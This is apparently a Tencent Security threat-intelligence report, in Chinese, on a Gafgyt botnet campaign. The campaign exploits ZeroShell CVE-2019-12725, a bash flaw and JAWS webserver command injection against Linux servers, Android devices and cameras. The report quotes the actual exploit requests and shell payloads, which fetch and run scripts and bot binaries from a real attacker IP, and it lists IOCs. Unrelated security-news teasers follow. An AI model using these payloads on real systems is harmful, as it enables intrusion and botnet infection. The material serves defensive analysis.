腾讯安全威胁情报中心检测到有境外IP针对国内Linux服务器的远程命令注入攻击。黑客通过批量扫描80、5555、60001端口来发现易受攻击的Linux服务器、android设备以及监控摄像头设备并利用ZeroShell远程代码执行漏洞(CVE-2019-12725)、bash shell漏洞、JAWS Webserver未授权shell命令执行漏洞进行攻击,攻击成功后下载Gafgyt家族木马。
Gafgyt是一种流行的僵尸 *** 程序,被认为是Mirai的前身,其源代码在2015年初被部分泄露。Gafgyt主要通过telent弱口令以及命令注入漏洞等方式进行攻击传播,通过感染基于Linux的IoT设备(包括基于Linux系统的路由器、智能摄像头等设备)来发起DDoS攻击,攻击类型以UDP、TCP和HTTP攻击为主。
腾讯安全系列产品应对Gafgyt僵尸 *** 的响应清单:
场景
胁
情
报
威胁情报云查服务
(SaaS)
各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics
高级威胁追溯系统
网管可通过威胁追溯系统,分析日志,进行线索研判、追溯 *** 入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts
防护
(Cloud Firewall,CFW)
1) Gafgyt僵尸 *** 关联的IOCs已支持识别检测;
2) 检测利用Zeroshell漏洞的命令注入攻击;
有关云防火墙的更多信息,可参考:
https://cloud.tencent.com/product/cfw
(Cloud Workload Protection,CWP)
2) 告警弱口令爆破行为;
腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp
关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html
高级威胁检测系统
(腾讯御界)
关于T-Sec高级威胁检测系统的更多信息,可参考:
https://cloud.tencent.com/product/nta
腾讯安全专家在日常安全巡检过程中发现攻击线索,腾讯云防火墙检测到攻击来源52.224.202.238:43787,针对目标系统80端口的命令注入攻击。
该攻击的payload为: GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*”;cd /tmp;curl -O http[:]//5.206.227.228/zero;sh zero;” HTTP/1.0 分析发现这次攻击利用的是ZeroShell远程代码执行漏洞(CVE-2019-12725),该漏洞在2019年7月被发现,攻击者可以通过构造具有固定特征的请求数据发送至目标系统,从而导致恶意代码执行。(ZeroShell是一套用于服务器和嵌入式设备的Linux发行版,它主要为局域网提供所需要的 *** 服务) 漏洞攻击成功后通过curl命令下载执行shell脚本zero,zero继续通过curl下载Gafgyt木马bot.x86_64和bot.x86并启动执行,分别为64位和32位木马文件。 bot.x86为Gafgyt僵尸 *** 家族木马样本,启动后首先打印特征字符串“9xsspnvgc8aj5pi7m28p”。 然后针对Linux服务器、android设备、视频监控设备的80、5555、60001端口进行扫描。 针对开放端口的设备利用ZeroShell远程代码执行漏洞(CVE-2019-12725)攻击,执行payload: GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*“;cd /tmp;curl -O http[:]//5.206.227.228/zero;sh zero;” 利用bash shell漏洞攻击,执行payload: shell[:]cd /data/local/tmp; busybox wget http[:]//5.206.227.228/wget -O -> wwww; sh wwww; curl -O http[:]//5.206.227.228/curl; sh curl;rm wwww curl 利用JAWS Webserver未授权shell命令执行漏洞攻击,执行Payload: GET /shell?cd /tmp;wget http[:]//5.206.227.228/jaw;sh jaw; ZeroShell远程代码执行漏洞(CVE-2019-12725)的攻击流量:IOCs
IP
5.206.227.228
URL
http[:]//5.206.227.228/zero
http[:]//5.206.227.228/curl
http[:]//5.206.227.228/wget
http[:]//5.206.227.228/k
http[:]//5.206.227.228/bot.x86_64
http[:]//5.206.227.228/bot.x86
http[:]//5.206.227.228/bot.arm5
http[:]//5.206.227.228/bot.arm6
http[:]//5.206.227.228/bot.arm7
http[:]//5.206.227.228/bot.aarch64
http[:]//5.206.227.228/bot.mips
http[:]//5.206.227.228/bot.mipsel
MD5
2520fc7d13ac3876cca580791d1c33a8
cc84fcc23567228337e45c9fbb78699f
10b9f21795e5ffbd52c407617d0bd4ef
38d8de098c7e560a34dabf8c1a2ed5f0
12b021bcd199585e86dd27523010105b
0e12d891a2fe2cecb6781f3e4d3551b4
aa389e7fb64cf274334712ecb3dfd2cd
2dabb8e039a77f0eb67e938d798ab7c4
03a7f039321ffb9938cc67d65c0b6459
a9109419954a421b712d48ea22b0a7b9
52fb891c536fe449b896f0f2cd2490d4
e2cec25584bfec1e56ee82f350dfeaf9
87859507c0d23793c78d86e0963a7a37
ba903efc3d2e37105e57232e7652b85c
891bbf7b562b34332fac12df2c29ddbb
6d9953a03c568ad97595723d1a09b291
aa9e9627ed6aba6415fb45f742f4f8dd
参考链接:
https://www.anquanke.com/vul/id/1030688
https://www.tarlogic.com/advisories/zeroshell-rce-root.txt
https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/
https://github.com/ifding/iot-malware
Facebook母公司Meta被欧盟罚款1700万欧元(约合1900万美元),原因是它未能阻止Facebook平台在2018年发生的一系列数据泄露事件,违反了欧盟的隐私规则。 Meta在欧盟的主要隐私监管机构爱尔兰数据保护委员会表示,他们发现Facebook“未能采取适当的技术和组织措施”。 20...
据Vice的报道,美财政部将Ronin网络6.25亿美元加密货币被盗事件归咎于朝鲜黑客组织。据悉,该网络是支持Axie Infinity游戏的区块链。当地时间周四,财政部更新了制裁措施,其中包括收到资金的钱包地址并将其归于Lazarus集团。 开发商集团Sky Mavis拥有的Ronin网络在关于...
近日,应用交付领域(ADN)全球领导者F5公司发布了一项安全警告,其研究团队监测到一个关键漏洞正在被积极利用。漏洞的追踪代码为CVE-2022-1388,CVSS 3.0评分为9.8,危险等级非常高。该漏洞允许未经身份验证的网络攻击者执行任意系统命令,执行文件操作,并禁用BIG-IP上的服务。 根...
FBI日前警告称,勒索软件集团正在瞄准涉及重大的、时间敏感的金融事件–如兼并和收购的公司,以此来胁迫受害者支付其赎金要求。FBI在本周写给私营公司的一份咨询中指出,网络犯罪分子在针对参与重大金融事件的公司时往往试图找到非公开信息,如果他们不支付赎金要求网络犯罪分子就会威胁公布这些信息。 “在最初的...
为了迎接今年 5 月首个周四的“世界密码日”的到来,USA Today 觉得很有必要继续提醒大家提升安全意识。首先是尽量为工作、娱乐、网银、网购等各种在线活动配备强密码,且需避免使用同一个密码,以免所有账号被攻击者一锅端。 资料图(来自:Bitwarden) 业内知名开源密码器(US News &...
申请一份新工作通常意味着向潜在的雇主交出一连串的个人信息,这就是为什么联邦调查局警告人们要警惕招聘网站上的假招聘广告,这些广告会窃取和出售你的详细资料。联邦调查局的互联网犯罪中心(IC3)公共服务公告警告说,自2019年以来,受害者因虚假招聘广告而损失的平均金额约为3000美元。 骗子经常仿冒正常...